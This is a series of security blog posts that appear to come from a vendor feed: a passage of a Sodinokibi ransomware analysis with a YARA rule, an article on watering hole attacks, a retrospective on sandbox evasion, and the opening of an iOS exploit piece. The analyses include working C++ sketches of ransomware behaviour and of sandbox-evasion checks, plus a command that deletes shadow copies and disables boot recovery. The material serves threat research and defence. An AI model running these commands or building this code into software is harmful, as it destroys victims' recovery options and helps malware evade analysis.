Later, during the execution, the malware will write in the Windows registry the next entries in the subkey “SOFTWARE\recfg” (this subkey can change in some samples but usually does not).

The key entries are:

  • 0_key -> Type binary; this is the master key (includes the victim’s generated random key to crypt later together with the key of the malware authors).
  • sk_key -> Like the 0_key entry, this is the victim’s private key, but encrypted with the affiliate public key hardcoded in the sample. It is the key used in the decryptor by the affiliate, but it also means that the malware authors can always decrypt any file encrypted by any sample, as a secondary resource to decrypt the files.
  • pk_key -> Victim public key derived from the private key.
  • subkey -> Affiliate public key to use.
  • stat -> The information gathered from the victim machine, encrypted; it is used in the ransom note and in the POST requests sent to the domains.
  • rnd_ext -> The random extension for the encrypted files (can be from 5 to 10 alphanumeric characters).

The malware first tries to write the subkey and the entries in the HKEY_LOCAL_MACHINE hive and, if that fails, it will write them in the HKEY_CURRENT_USER hive.

FIGURE 11. EXAMPLE OF REGISTRY ENTRIES AND SUBKEY IN THE HKLM HIVE
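A sketch of that write-to-HKLM-then-fall-back-to-HKCU pattern is shown below, using the rnd_ext entry as an example; the value content is a placeholder.

#include <windows.h>

bool StoreConfigValue(const wchar_t* name, const BYTE* data, DWORD len, DWORD type) {
    const HKEY hives[] = { HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER };
    for (HKEY hive : hives) {
        HKEY hKey = nullptr;
        // Subkey observed in the analyzed samples; it can differ per sample.
        if (RegCreateKeyExW(hive, L"SOFTWARE\\recfg", 0, nullptr, 0,
                            KEY_SET_VALUE, nullptr, &hKey, nullptr) == ERROR_SUCCESS) {
            LONG rc = RegSetValueExW(hKey, name, 0, type, data, len);
            RegCloseKey(hKey);
            if (rc == ERROR_SUCCESS) return true;   // HKLM worked; no fallback needed
        }
        // Otherwise fall through and retry under HKEY_CURRENT_USER.
    }
    return false;
}

// Example use with a placeholder random extension (5-10 alphanumeric characters):
// StoreConfigValue(L"rnd_ext", (const BYTE*)L"ab12c", 6 * sizeof(wchar_t), REG_SZ);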

The information that the malware gets from the victim machine can be the user name, the machine name, the domain where the machine belongs or, if not, the workgroup, the product name (operating system name), etc.

After this step is completed, the malware will check the “dbg” option gathered from the config; if that value is ‘true’, it will skip checking the language of the machine, but if the value is ‘false’ (the default), it will check the machine language and compare it with a list of hardcoded values.

FIGURE 12. GET THE KEYBOARD LANGUAGE OF THE SYSTEM

The malware checks against the next list of blacklisted languages (they can change per sample in some cases):

  • 0x818 – Romanian (Moldova)
  • 0x419 – Russian
  • 0x819 – Russian (Moldova)
  • 0x422 – Ukrainian
  • 0x423 – Belarusian
  • 0x425 – Estonian
  • 0x426 – Latvian
  • 0x427 – Lithuanian
  • 0x428 – Tajik
  • 0x429 – Persian
  • 0x42B – Armenian
  • 0x42C – Azeri
  • 0x437 – Georgian
  • 0x43F – Kazakh
  • 0x440 – Kyrgyz
  • 0x442 – Turkmen
  • 0x443 – Uzbek
  • 0x444 – Tatar
  • 0x45A – Syrian
  • 0x2801 – Arabic (Syria)

We observed that Sodinokibi, like GandCrab and Anatova, blacklists the regular Syrian language as well as Syrian Arabic. If the system language is one of those in the list, the malware will exit without performing any action. If a different language is detected, it will continue its normal flow.

This is interesting and may hint to an affiliate being involved who has mastery of either one of the languages. This insight became especially interesting later in our investigation.
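A minimal sketch of such a keyboard-layout check is shown below; it compares the installed layouts against a subset of the language IDs listed above and is our own illustration rather than the decompiled routine.

#include <windows.h>

bool IsBlacklistedLocale() {
    // Subset of the blacklisted LANGIDs from the list above.
    const WORD blacklist[] = { 0x419, 0x422, 0x423, 0x43F, 0x2801, 0x818, 0x819 };
    HKL layouts[64] = {};
    int count = GetKeyboardLayoutList(64, layouts);
    for (int i = 0; i < count; ++i) {
        WORD langId = LOWORD((ULONG_PTR)layouts[i]);   // language identifier of the layout
        for (WORD blocked : blacklist) {
            if (langId == blocked) return true;        // exit without doing anything
        }
    }
    return false;
}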

If the malware continues, it will search for all processes named in the config field “prc” and terminate them in a loop, to unlock the files that are locked by those processes.

FIGURE 13. SEARCH FOR TARGET PROCESSES AND TERMINATE THEM

After this it will destroy all shadow volumes of the victim machine and disable the protection of the recovery boot with this command:

  • cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures

It is executed with the Windows function “ShellExecuteW”.

FIGURE 14. LAUNCH COMMAND TO DESTROY SHADOW VOLUMES AND DESTROY SECURITY IN THE BOOT

Next it will check the config field “wipe” and, if it is true, it will destroy and delete the target files, overwriting them with random trash or with NULL values. When destroying the files, the malware enumerates all logical units and, finally, the network shares, targeting the folders whose names appear in the config field “wfld”.

FIGURE 15. WIPE FILES IN THE TARGET FOLDERS

In the case where an affiliate creates a sample that has defined a lot of folders in this field, the ransomware can be a solid wiper of the full machine.

The next action of the malware is its main function, encrypting the files in all logic units and network shares, avoiding the white listed folders and names of files and extensions, and dropping the ransom note prepared from the template in each folder.

FIGURE 16. CRYPT FILES IN THE LOGIC UNITS AND NETWORK SHARES

After finishing this step, it will create the desktop wallpaper image at runtime, with the text that comes in the config file, prepared with the random extension that affects the machine.

The next step is checking the field “net” from the config, and, if true, will start sending a POST message to the list of domains in the config file in the field “dmn”.

FIGURE 17. PREPARE THE FINAL URL RANDOMLY PER DOMAIN TO MAKE THE POST COMMAND

This part of the code has similarities to the code of GandCrab, which we will highlight later in this article.

After this step the malware cleans its own memory of variables and strings. It does not remove the malware code itself, but it does remove the critical contents, to defeat memory dumps or forensic tools that could gather information from RAM.

FIGURE 18. CLEAN MEMORY OF VARS

If the malware was running as SYSTEM after the exploit, it will revert its rights and finally finish its execution.

FIGURE 19. REVERT THE SYSTEM PRIVILEGE EXECUTION LEVEL

Code Comparison with GandCrab

Using the unpacked Sodinokibi sample and a v5.03 version of GandCrab, we started to use IDA and BinDiff to observe any similarities. Based on the Call-Graph it seems that there is an overall 40 percent code overlap between the two:

FIGURE 20. CALL-GRAPH COMPARISON

The most overlap seems to be in the functions of both families. Although values change, going through the code reveals similar patterns and flows:

Although here and there are some differences, the structure is similar:

 

We already mentioned that the code responsible for the random URL generation has similarities with the way it is generated in the GandCrab malware. Sodinokibi uses one function to execute this part, whereas GandCrab uses three functions to generate the random URL. Where we do see a similar structure is in the building blocks of the to-be-generated URL in both malware codes. We created a visual to explain the comparison better:

FIGURE 21. URL GENERATION COMPARISON

We observe that, even though the way both ransomware families generate the URL might differ, the URL directories and file extensions used have a similarity that seems to be more than coincidence. This observation was also made by Tesorion in one of its blogs.
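As a rough illustration of this style of URL generation, the sketch below assembles a pseudo-random path from small word lists; the lists themselves are placeholders and not the actual hardcoded values from either family.

#include <random>
#include <string>
#include <vector>

// Builds a benign-looking path such as "/news/images/picture.jpg" from word lists.
// The word lists here are illustrative placeholders, not the real hardcoded ones.
std::string RandomUrlPath(std::mt19937& rng) {
    const std::vector<std::string> dirs  = { "news", "content", "include", "uploads" };
    const std::vector<std::string> subs  = { "images", "pictures", "tmp", "assets" };
    const std::vector<std::string> names = { "picture", "image", "photo", "report" };
    const std::vector<std::string> exts  = { "jpg", "png", "gif" };
    auto pick = [&rng](const std::vector<std::string>& v) {
        std::uniform_int_distribution<size_t> d(0, v.size() - 1);
        return v[d(rng)];
    };
    return "/" + pick(dirs) + "/" + pick(subs) + "/" + pick(names) + "." + pick(exts);
}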

Overall, looking at the structure and coincidences, either the developers of the GandCrab code used it as a base for creating a new family or, another hypothesis, is that people got hold of the leaked GandCrab source code and started the new RaaS Sodinokibi.

Conclusion

Sodinokibi is a serious new ransomware threat that is hitting many victims all over the world.

We executed an in-depth analysis comparing GandCrab and Sodinokibi and discovered a lot of similarities, indicating the developer of Sodinokibi had access to GandCrab source-code and improvements. The Sodinokibi campaigns are ongoing and differ in skills and tools due to the different affiliates operating these campaigns, which begs more questions to be answered. How do they operate? And is the affiliate model working? McAfee ATR has the answers in episode 2, “The All Stars.”

Coverage

McAfee is detecting this family by the following signatures:

  • “Ransom-Sodinokibi”
  • “Ransom-REvil!”.

MITRE ATT&CK Techniques

The malware sample uses the following MITRE ATT&CK™ techniques:

  • File and Directory Discovery
  • File Deletion
  • Modify Registry
  • Query Registry
  • Registry modification
  • Query information of the user
  • Crypt Files
  • Destroy Files
  • Make C2 connections to send information of the victim
  • Modify system configuration
  • Elevate privileges

YARA Rule

rule Sodinokobi
{
    /*
        This rule detects Sodinokobi Ransomware in memory in old samples and perhaps future.
    */
    meta:
        author      = "McAfee ATR team"
        version     = "1.0"
        description = "This rule detect Sodinokobi Ransomware in memory in old samples and perhaps future."

    strings:
        $a = { 40 0F B6 C8 89 4D FC 8A 94 0D FC FE FF FF 0F B6 C2 03 C6 0F B6 F0 8A 84 35 FC FE FF FF 88 84 0D FC FE FF FF 88 94 35 FC FE FF FF 0F B6 8C 0D FC FE FF FF }
        $b = { 0F B6 C2 03 C8 8B 45 14 0F B6 C9 8A 8C 0D FC FE FF FF 32 0C 07 88 08 40 89 45 14 8B 45 FC 83 EB 01 75 AA }

    condition:
        all of them
}

 


How Visiting a Trusted Site Could Infect Your Employees

The Artful and Dangerous Dynamics of Watering Hole Attacks

A group of researchers recently published findings of an exploitation of multiple iPhone vulnerabilities using websites to infect final targets. The key concept behind this type of attack is the use of trusted websites as an intermediate platform to attack others, and it’s defined as a watering hole attack.

How Does it Work?

Your organization is an impenetrable fortress that has implemented every single cybersecurity measure. Bad actors are having a hard time trying to compromise your systems. But what if the weakest link is not your organization, but a third-party? That is where an “island hopping” attack can take apart your fortress.

“Island hopping” was a military strategy aimed at concentrating efforts on strategically positioned (and weaker) islands to gain access to a final mainland target.

One relevant instance of “island hopping” is a watering hole attack. A watering hole attack is motivated by an attacker’s frustration: if they cannot get to a target, maybe they can compromise a weaker secondary one to gain access to the intended one. Employees in an organization interact with third-party websites and services all the time. It could be with a provider, an entity in the supply chain, or even with a publicly available website. Even though your organization may have cutting-edge security perimeter protection, the third parties you interact with may not.

In this type of attack, bad actors start profiling employees to find out what websites/services they usually consume. What is the most frequented news blog? Which flight company do they prefer? Which service provider do they use to check pay stubs? What type of industry is the target organization in and what are the professional interests of its employees, etc.?

Based on this profiling, they analyze which one of the many websites visited by employees is weak and vulnerable. When they find one, the next step is compromising this third-party website by injecting malicious code, hosting malware, infecting existing/trusted downloads, or redirecting the employee to a phishing site to steal credentials. Once the site has been compromised, they will wait for an employee of the target organization to visit the site and get infected, sometimes pushed by an incentive such as a phishing email sent to the employees. Sometimes this requires some sort of interaction, such as the employee using a file upload form, downloading a previously trusted PDF report or attempting to login on a phishing site after a redirection from the legitimate one. Finally, bad actors will move laterally from the infected employee device to the desired final target(s).

Figure 1: Watering Hole Attack Dynamics

Victims of a watering hole attack are not only the final targets but also strategic organizations that are involved during the attack chain. As an example, a watering hole attack was discovered in March 2019, targeting member states of the United Nations by compromising the International Civil Aviation Organization (ICAO) as intermediate target[1]. Because the ICAO was a website frequented by the intended targets, it got compromised by exploiting vulnerable servers. Another example from last year is a group of more than 20 news and media websites that got compromised as intermediate targets to get to specific targets in Vietnam and Cambodia[2].

Risk analysis

Because this kind of attack relies on vulnerable but trusted third-party sites, it usually goes unnoticed and is not easily linked to further data breaches. To make sure this potential threat is being considered in your risk analysis, here are some of the questions you need to ask:

  • How secure are the websites and services of the entities I interact with?
  • Are the security interests of third parties aligned with mine? (Hint: probably not! You may be rushing to patch your web server but that does not mean a third-party site is doing the same).
  • What would be the impact of a watering hole attack for my organization?

As with every threat, it is important to analyze both the probability of this threat as well as how difficult it would be for attackers to implement it. This will vary from organization to organization, but one generic approach is to analyze the most popular websites. When checking the top one million websites around the world, it is interesting to note that around 60%[3] of these are using Content Management Systems (CMSs) such as WordPress, Joomla or Drupal.

This creates an extra challenge as these popular CMSs are statistically more likely to be present in an organization’s network traffic and, therefore, are more likely to be targeted for a watering hole attack. It is not surprising then that dozens of vulnerabilities on CMSs are discovered and exploited every month (around 1000 vulnerabilities were discovered in the last two years for just the top 4 CMSs[4]). What is more concerning is that CMSs are designed to be integrated with other services and extended using plugins (more than 55,000 plugins are available as of today). This further expands the attack surface as it creates the opportunity of compromising small libraries/plugins being used by these frameworks.

Consequently, CMSs are frequently targeted by watering hole attacks by exploiting vulnerabilities that enable bad actors to gain control of the server/site, modifying its content to serve a malicious purpose. In some advanced scenarios, they will also add fingerprinting scripts to check the IP address, time zone and other useful details about the victim. Based on this data, bad actors can automatically decide to let go when the victim is not an employee of the desired company or move further in the attack chain when they have hit the jackpot.

Defending against watering hole attacks

As organizations harden their security posture, bad actors are being pushed to new boundaries. Therefore, watering hole attacks are gaining traction as these allow bad actors to compromise intermediate (more vulnerable) targets to later get access to the intended final target. To help keep your organization secure against watering hole attacks, make sure you are including web protection. McAfee Web Gateway can help provide additional defense against certain classes of attacks, even when the user is visiting a site that has been compromised by a watering hole attack, with behavior emulation that aims to prevent zero-day malware in milliseconds as traffic is processed. You may also want to:

  • Build a Zero Trust model, especially around employees visiting publicly available websites, to make sure that even if a watering hole attack is targeting your organization, you can stop it from moving forward.
  • Regularly check your organization’s network traffic to identify vulnerable third-party websites that your employees might be exposed to.
  • Check the websites and services exposed by your organization’s providers. Are these secure enough and properly patched? If not, consider the possibility that these may become intermediate targets and apply policies to limit the exposure to these sites (e.g. do not allow downloads if that is an option).
  • When possible, alert providers about unpatched web servers, CMS frameworks or libraries, so they can promptly mitigate the risk.

Dealing with watering hole attacks requires us to be more attentive and to carefully review the websites we visit, even if these are cataloged as trusted sites. By doing so, we will not only mitigate the risk of watering hole attacks, but also steer away from one possible pathway to data breaches.

[1] https://securityaffairs.co/wordpress/81790/apt/icao-hack-2016.html

[2] https://www.scmagazine.com/home/security-news/for-the-last-few-months-the-threat-group-oceanlotus-also-known-as-apt32-and-apt-c-00-has-been-carrying-out-a-watering-hole-campaign-targeting-several-websites-in-southeast-asia/

[3] “Usage of content management systems”, https://w3techs.com/technologies/overview/content_management/all

[4] “The state of web application vulnerabilities in 2018”, https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/


Evolution of Malware Sandbox Evasion Tactics – A Retrospective Study

Executive Summary

Malware evasion techniques are widely used to circumvent detection as well as analysis and understanding. One of the dominant categories of evasion is anti-sandbox detection, simply because today’s sandboxes are becoming the fastest and easiest way to get an overview of a threat. Many companies use these kinds of systems to detonate malicious files and URLs they find, to obtain more indicators of compromise, extend their defenses and block other related malicious activity. Nowadays we understand security as a global process of which sandbox systems are a part, and that is why we must pay attention to the methods malware uses to detect them and how we can defeat those methods.

Historically, sandboxes had allowed researchers to visualize the behavior of malware accurately within a short period of time. As the technology evolved over the past few years, malware authors started producing malicious code that delves much deeper into the system to detect the sandboxing environment.

As sandboxes became more sophisticated and evolved to defeat the evasion techniques, we observed multiple strains of malware that dramatically changed their tactics to remain a step ahead. In the following sections, we look back on some of the most prevalent sandbox evasion techniques used by malware authors over the past few years and validate the fact that malware families extended their code in parallel to introducing more stealthier techniques.

The following diagram shows one of the most prevalent sandbox evasion tricks we will discuss in this blog, although many others exist.

Delaying Execution

Initially, several strains of malware were observed using timing-based evasion techniques [latent execution], which primarily boiled down to delaying the execution of the malicious code for a period using known Windows APIs like NtDelayExecution, CreateWaitableTimer, SetTimer and others. These techniques remained popular until sandboxes started identifying and mitigating them.
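A bare-bones example of such latent execution, here using a waitable timer, is shown below; the ten-minute delay is an arbitrary illustrative value.

#include <windows.h>

// Stall for ten minutes before doing anything malicious, hoping the sandbox
// gives up on the sample before the real behavior appears.
void DelayExecution() {
    HANDLE hTimer = CreateWaitableTimerW(nullptr, TRUE, nullptr);
    if (!hTimer) { Sleep(10 * 60 * 1000); return; }        // fallback: plain Sleep
    LARGE_INTEGER due;
    due.QuadPart = -(10LL * 60 * 1000 * 1000 * 10);        // 10 minutes, in 100 ns units
    SetWaitableTimer(hTimer, &due, 0, nullptr, nullptr, FALSE);
    WaitForSingleObject(hTimer, INFINITE);
    CloseHandle(hTimer);
}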

GetTickCount

As sandboxes identified these delays and attempted to defeat them by accelerating code execution, malware resorted to acceleration checks using multiple methods. One of those methods, used by multiple malware families including Win32/Kovter, was calling the Windows API GetTickCount followed by code that checks whether the expected time has actually elapsed. We observed several variations of this method across malware families.

This evasion technique could be easily bypassed by sandbox vendors simply by creating a snapshot in which the machine has already been running for more than 20 minutes.
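The underlying acceleration check is only a few lines; a minimal, illustrative version (with arbitrary thresholds) looks like this:

#include <windows.h>

// If a sandbox fast-forwards or skips the Sleep, far less wall-clock time
// elapses than requested and the sample can bail out.
bool SleepWasAccelerated() {
    DWORD before = GetTickCount();
    Sleep(10 * 60 * 1000);                       // ask for a 10 minute nap
    DWORD elapsed = GetTickCount() - before;     // wrap-around safe for this range
    return elapsed < 9 * 60 * 1000;              // came back too early -> likely a sandbox
}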

API Flooding

Another approach that subsequently became more prevalent, observed in the Win32/Cutwail malware, is calling garbage APIs in a loop to introduce a delay, dubbed API flooding. Below is the code from the malware that shows this method.
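Conceptually, API flooding boils down to something like the following sketch, in which a cheap, harmless API is hammered in a loop purely to burn time inside an instrumented sandbox; the chosen API and the iteration count are our own illustrative picks, not the Cutwail values.

#include <windows.h>

// Garbage-API loop: each call is meaningless, but an instrumented sandbox
// pays a logging/hooking cost for every one of them.
void ApiFlood() {
    volatile DWORD sink = 0;
    for (unsigned long i = 0; i < 50000000UL; ++i) {
        sink ^= GetCurrentProcessId();   // any cheap, side-effect-free API will do
    }
}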

 

 

Inline Code

We observed how this code resulted in a DoS (denial of service) condition, since sandboxes could not handle it well enough. On the other hand, this sort of behavior is not too difficult to detect for more involved sandboxes. As they became more capable of handling API-based stalling code, yet another strategy to achieve a similar objective was to introduce inline assembly code that waited for more than 5 minutes before executing the hostile code. We found this technique in use as well.

Although simplistic, this approach could sidestep most of the advanced sandboxes of the time. Sandboxes are now much more capable, armed with code instrumentation and full system emulation that can identify and report stalling code. In our observation, the following depicts the growth of the popular timing-based evasion techniques used by malware over the past few years.

Hardware Detection

Another category of evasion tactic widely adopted by malware was fingerprinting the hardware, specifically checking the total physical memory size, the available hard disk size and type, and the number of available CPU cores.

These methods became prominent in malware families like Win32/Phorpiex, Win32/Comrerop, Win32/Simda and multiple other prevalent ones. Based on our tracking of their variants, we noticed Windows API DeviceIoControl() was primarily used with specific Control Codes to retrieve the information on Storage type and Storage Size.

Ransomware and cryptocurrency mining malware were found to be checking for total available physical memory using a known GlobalMemoryStatusEx () trick. A similar check is shown below.
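As a generic illustration of this memory-size check (the threshold of 4 GB below is an assumption for the example, not taken from a specific sample):

#include <windows.h>

int main() {
    MEMORYSTATUSEX ms = { sizeof(ms) };         // dwLength must be set before the call
    GlobalMemoryStatusEx(&ms);
    if (ms.ullTotalPhys < 4ULL * 1024 * 1024 * 1024) {
        return 0;                               // small RAM: assume an analysis VM and exit
    }
    // ... malicious payload would execute here ...
    return 0;
}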

Storage Size check:

Illustrated below is an example API interception code implemented in the sandbox that can manipulate the returned storage size.

Subsequently, a Windows Management Instrumentation (WMI) based approach became more favored since these calls could not be easily intercepted by the existing sandboxes.

Here is our observed growth path in the tracked malware families with respect to the Storage type and size checks.

CPU Temperature Check

Malware authors are always adding new and interesting methods to bypass sandbox systems. Another check that is quite interesting involves checking the temperature of the processor in execution.

A code sample where we saw this in the wild is:

The check is executed through a WMI query on the system. This is interesting because virtualized systems typically never return a result for this query, which the malware interprets as a sign of a sandbox.
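A hedged sketch of such a probe is shown below; the class commonly used for this trick is MSAcpi_ThermalZoneTemperature in the root\WMI namespace, and the query typically returns no instances on a hypervisor. This is an illustration, not the in-the-wild sample's code.

#define _WIN32_DCOM
#include <windows.h>
#include <wbemidl.h>
#include <comdef.h>
#pragma comment(lib, "wbemuuid.lib")

bool ThermalZonePresent() {
    bool found = false;
    if (FAILED(CoInitializeEx(nullptr, COINIT_MULTITHREADED))) return false;
    CoInitializeSecurity(nullptr, -1, nullptr, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT,
                         RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_NONE, nullptr);

    IWbemLocator* locator = nullptr;
    IWbemServices* services = nullptr;
    IEnumWbemClassObject* results = nullptr;

    if (SUCCEEDED(CoCreateInstance(CLSID_WbemLocator, nullptr, CLSCTX_INPROC_SERVER,
                                   IID_IWbemLocator, (LPVOID*)&locator)) &&
        SUCCEEDED(locator->ConnectServer(_bstr_t(L"ROOT\\WMI"), nullptr, nullptr, nullptr,
                                         0, nullptr, nullptr, &services))) {
        CoSetProxyBlanket(services, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, nullptr,
                          RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE,
                          nullptr, EOAC_NONE);
        if (SUCCEEDED(services->ExecQuery(_bstr_t(L"WQL"),
                _bstr_t(L"SELECT * FROM MSAcpi_ThermalZoneTemperature"),
                WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, nullptr, &results))) {
            IWbemClassObject* obj = nullptr;
            ULONG returned = 0;
            // Physical machines typically expose at least one thermal zone object.
            found = (results->Next(WBEM_INFINITE, 1, &obj, &returned) == WBEM_S_NO_ERROR
                     && returned != 0);
            if (obj) obj->Release();
        }
    }
    if (results) results->Release();
    if (services) services->Release();
    if (locator) locator->Release();
    CoUninitialize();
    return found;   // false => the evasive code would behave benignly, assuming a sandbox
}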

CPU Count

Popular malware families like Win32/Dyreza were seen using the CPU core count as an evasion strategy. Several malware families were initially found using a trivial API based route, as outlined earlier. However, most malware families later resorted to WMI and stealthier PEB access-based methods.

Evasion code that does not rely on APIs is challenging for a sandboxing environment to identify, so malware authors look to use it more often. Below is a similar check introduced in earlier strains of malware.

There are a number of ways to get the CPU core count, though the stealthier way is to access the PEB, which can be achieved by introducing inline assembly code or by using intrinsic functions.
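A minimal sketch of the PEB-based variant is shown below; the offsets used are the commonly documented PEB layout (0x64 on x86, 0xB8 on x64) and should be verified for the target build:

// Read the processor count from the PEB via compiler intrinsics, avoiding any API a sandbox might hook.
#include <windows.h>
#include <intrin.h>

DWORD CoreCountFromPeb() {
#ifdef _WIN64
    BYTE* peb = (BYTE*)__readgsqword(0x60);     // PEB pointer from the TEB
    return *(DWORD*)(peb + 0xB8);               // PEB->NumberOfProcessors
#else
    BYTE* peb = (BYTE*)__readfsdword(0x30);
    return *(DWORD*)(peb + 0x64);
#endif
}

int main() {
    // Evasive samples commonly treat fewer than two cores as a sandbox signal.
    if (CoreCountFromPeb() < 2) return 0;       // bail out quietly
    // ... malicious payload would execute here ...
    return 0;
}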

One of the relatively newer techniques for getting the CPU core count has been outlined in a blog, here. However, in our observations of malware using the CPU core count to evade automated analysis systems, the techniques below were adopted in the sequence outlined.

User Interaction

Another class of infamous techniques malware authors used extensively to circumvent the sandboxing environment was to exploit the fact that automated analysis systems are never manually interacted with by humans. Conventional sandboxes were never designed to emulate user behavior and malware was coded with the ability to determine the discrepancy between the automated and the real systems. Initially, multiple malware families were found to be monitoring for Windows events and halting the execution until they were generated.

Below is a snapshot from a Win32/Gataka variant using GetForegroundWindow and checking whether a second call to the same API returns a different window handle. The same technique was found in Locky ransomware variants.
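A generic sketch of this foreground-window check (not the Gataka or Locky code itself):

#include <windows.h>

int main() {
    HWND first = GetForegroundWindow();
    for (int i = 0; ; ++i) {
        Sleep(1000);
        if (GetForegroundWindow() != first) break;  // the handle changed: a human switched windows
        if (i >= 300) return 0;                     // no change in ~5 minutes: assume a sandbox, exit
    }
    // ... malicious payload would execute here ...
    return 0;
}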

Below is another snapshot from the Win32/Sazoora malware, checking for mouse movements, which became a technique widely used by several other families.

Malware campaigns were also found deploying a range of techniques to check historical interactions with the infected system. One such campaign, delivering the Dridex malware, extensively used the Auto Execution macro that triggered only when the document was closed. Below is a snapshot of the VB code from one such campaign.

The same malware campaign was also found introducing Registry key checks in the code for MRU (Most Recently Used) files to validate historical interactions with the infected machine. Variations in this approach were found doing the same check programmatically as well.

MRU check using Registry key: \HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\User MRU

Programmatic version of the above check:
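The campaign's own code is shown only as a screenshot; a generic sketch of an equivalent programmatic check is:

#include <windows.h>

// A machine with no Word MRU history looks freshly provisioned, i.e. sandbox-like.
bool HasWordMruHistory() {
    HKEY key = nullptr;
    if (RegOpenKeyExA(HKEY_CURRENT_USER,
            "Software\\Microsoft\\Office\\16.0\\Word\\User MRU",
            0, KEY_READ, &key) != ERROR_SUCCESS) {
        return false;                               // key absent: no Office history at all
    }
    DWORD subKeys = 0, values = 0;
    RegQueryInfoKeyA(key, nullptr, nullptr, nullptr, &subKeys, nullptr, nullptr,
                     &values, nullptr, nullptr, nullptr, nullptr);
    RegCloseKey(key);
    return (subKeys + values) > 0;                  // real users accumulate MRU entries
}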

Here is our depiction of how these approaches gained adoption among evasive malware.

Environment Detection

Another technique used by malware is to fingerprint the target environment, exploiting any misconfiguration of the sandbox. In the beginning, tricks such as the Red Pill technique were enough to detect the virtual environment, until sandboxes started to harden their architecture. Malware authors then adopted new techniques, such as checking the hostname against common sandbox names or inspecting the registry to verify which programs are installed; a very small number of installed programs can indicate a fake machine. Other techniques have also been implemented, such as checking the filename for a hash or a keyword (such as "malware"), enumerating running processes to spot potential monitoring tools, and checking the network address against blacklisted ranges, such as those of AV vendors.
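As a small illustration, a hostname check might look like the sketch below; the names in the blocklist are placeholders, not a real list used by any family:

#include <windows.h>
#include <array>
#include <cctype>
#include <string>

bool LooksLikeSandboxHost() {
    char name[MAX_COMPUTERNAME_LENGTH + 1] = {};
    DWORD len = sizeof(name);
    if (!GetComputerNameA(name, &len)) return false;
    std::string host(name);
    for (char& c : host) c = (char)std::toupper((unsigned char)c);
    const std::array<const char*, 3> suspicious = { "SANDBOX", "MALTEST", "ANALYSIS" };
    for (const char* s : suspicious)
        if (host.find(s) != std::string::npos) return true;  // hostname matches a common analysis-box name
    return false;
}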

Locky and Dridex, for example, used tricks such as checking the network address.

Using Evasion Techniques in the Delivery Process

In the past few years we have observed how sandbox detection and evasion techniques have been increasingly implemented in the delivery mechanism to make detection and analysis harder. Attackers are increasingly likely to add a layer of protection to their infection vectors to avoid burning their payloads, so it is common to find evasion techniques in malicious Word documents and other weaponized documents.

McAfee Advanced Threat Defense

McAfee Advanced Threat Defense (ATD) is a sandboxing solution which detonates the sample under analysis in a controlled environment, performing malware detection through advanced static and dynamic behavioral analysis. As a sandboxing solution it defeats the evasion techniques seen in many adversaries. McAfee's sandboxing technology is armed with multiple advanced capabilities that complement each other to bypass evasion techniques that attempt to check for the presence of virtualized infrastructure, and it mimics real physical machines so that the analysis environment does not betray itself as a sandbox. The evasion techniques described in this paper, where adversaries employ code or behavior to evade detection, are bypassed by the McAfee Advanced Threat Defense sandbox, which handles:

  • Use of Windows APIs to delay execution of the sample, and checks on hard disk size, CPU core count and other environment information.
  • Methods to identify human interaction through mouse clicks, keyboard strokes and interactive message boxes.
  • Retrieval of hardware information such as hard disk size, CPU count and hardware vendor, including checks through registry artifacts.
  • System uptime checks to identify how long the system has been running.
  • Checks for the color depth and screen resolution of Windows.
  • Checks for recently used documents and files.

In addition to this, McAfee Advanced Threat Defense is equipped with smart static analysis engines as well as machine-learning based algorithms that play a significant detection role when samples detect the virtualized environment and exit without exhibiting malicious behavior. One of McAfee's flagship capabilities, the Family Classification Engine, works at the assembly level and provides significant traces once a sample is loaded in memory, even if sandbox detonation does not complete, resulting in enhanced detection for our customers.

Conclusion

Traditional sandboxing environments were built by running virtual machines over one of the available virtualization solutions (VMware, VirtualBox, KVM, Xen) which leaves huge gaps for evasive malware to exploit.

Malware authors continue to improve their creations by adding new techniques to bypass security solutions, and sandbox detection remains a powerful evasion strategy. As detection technologies improve, so do malware techniques.

Sandboxing systems are now equipped with advanced instrumentation and emulation capabilities which can detect most of these techniques. However, we believe the next step in sandboxing technology is the bare-metal analysis environment, which can defeat virtually any form of virtualization-detection behavior, although other common sandbox weaknesses, such as the absence of user interaction, will still be easy for malware to detect.

The post Evolution of Malware Sandbox Evasion Tactics – A Retrospective Study appeared first on McAfee Blogs.

Apple iOS Attack Underscores Importance of Threat Research

The recent discovery of exploit chains targeting Apple iOS is the latest example of how cybercriminals can successfully operate malicious campaigns, undetected, through the use of zero-day vulnerabilities.

In this scenario, a threat actor or actors operated multiple compromised websites, using at least one zero-day vulnerability along with numerous unique exploit chains and known vulnerabilities to compromise iPhones, even those running the latest version of the operating system, for more than two years. It takes remarkable talent and resources to operate this kind of infrastructure without being detected, as potentially thousands of users were compromised without the campaign being identified.

Every villain necessitates a hero, and this campaign underscores the importance of threat research and responsible vulnerability disclosure. Cybercriminals are getting faster, smarter, and more dangerous with each day that passes. The collective power of a global community of researchers working together to identify and disclose critical vulnerabilities, such as those used in this attack, is an important way to make meaningful progress towards eliminating these types of malicious campaigns. Equally important is dissecting attacks in their aftermath to expose unique and interesting characteristics and empower defenders and developers to mitigate these threats in the future. With that said, let's take a look.

An Attack Hiding in Plain Sight

This attack is unique in that the implant was not operating stealthily and was uploading information without encryption. This means a user monitoring their network traffic would notice activity as their information was being uploaded to the attacker’s server in cleartext.

Further, there appears to be debug messages left in the code, so a user connecting their phone to their computer and reviewing console logs, would notice activity as well.

However, given the “closed” operating system on the iPhone, a user would need to take the extra step of connecting their phone to their computer in order to notice these attack indicators. Given this, even a power user would be likely to remain unaware of an infection.

The Value of iOS Exploits

Finding iOS exploits in general is challenging due to the proprietary codebase and modern security mitigations. However, the type of exploits that require no user interaction and result in full remote code execution are the most rare, valuable, and difficult to uncover.

